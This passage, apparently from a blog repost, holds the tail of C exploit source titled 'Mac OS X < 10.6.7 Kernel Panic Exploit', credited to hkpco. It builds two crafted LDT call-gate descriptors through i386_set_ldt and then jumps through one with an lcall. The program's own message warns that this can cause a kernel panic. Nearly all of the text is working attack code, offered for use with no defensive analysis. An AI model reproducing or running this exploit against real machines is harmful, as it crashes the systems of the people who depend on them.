cgate.call_gate.argcnt = 0;
cgate.call_gate.type = 0xc; // DESC_CALL_GATE
cgate.call_gate.dpl = 3;
cgate.call_gate.present = 1;

cgate.call_gate.seg.rpl = 0;
cgate.call_gate.seg.ti = 0;
cgate.call_gate.seg.index = 16;

cgate2.call_gate.offset00 = 0x0;

cgate2.call_gate.seg.rpl = 0;
cgate2.call_gate.seg.ti = 0;
cgate2.call_gate.seg.index = 0;

cgate2.call_gate.argcnt = 0;
cgate2.call_gate.type = 0;
cgate2.call_gate.dpl = 0;
cgate2.call_gate.present = 1;

cgate2.call_gate.offset16 = 0x0;

printf( "// coded by Chanam Park (hkpco)\n\n" );

ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate, 1 );
printf( "Selector Number in LDT <1>: 0x%x\n", ret );

ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate2, 1 );
printf( "Selector Number in LDT <2>: 0x%x\n\n", ret );

printf( "If you run this program, it can possibly cause \"Kernel Panic\".\n" );
printf( "The program will be continued when you input any value.\n" );
printf( "-> " );
fflush(stdout);
scanf( "%s", dummy );

asm volatile( "lcall $0x3f, $0x0" );
// Trigger

return 0;
}

Baca Selengkapnya... Mac OS X < 10.6.7 Kernel Panic Exploit

-=[ D4wFl1N ]=-

Pages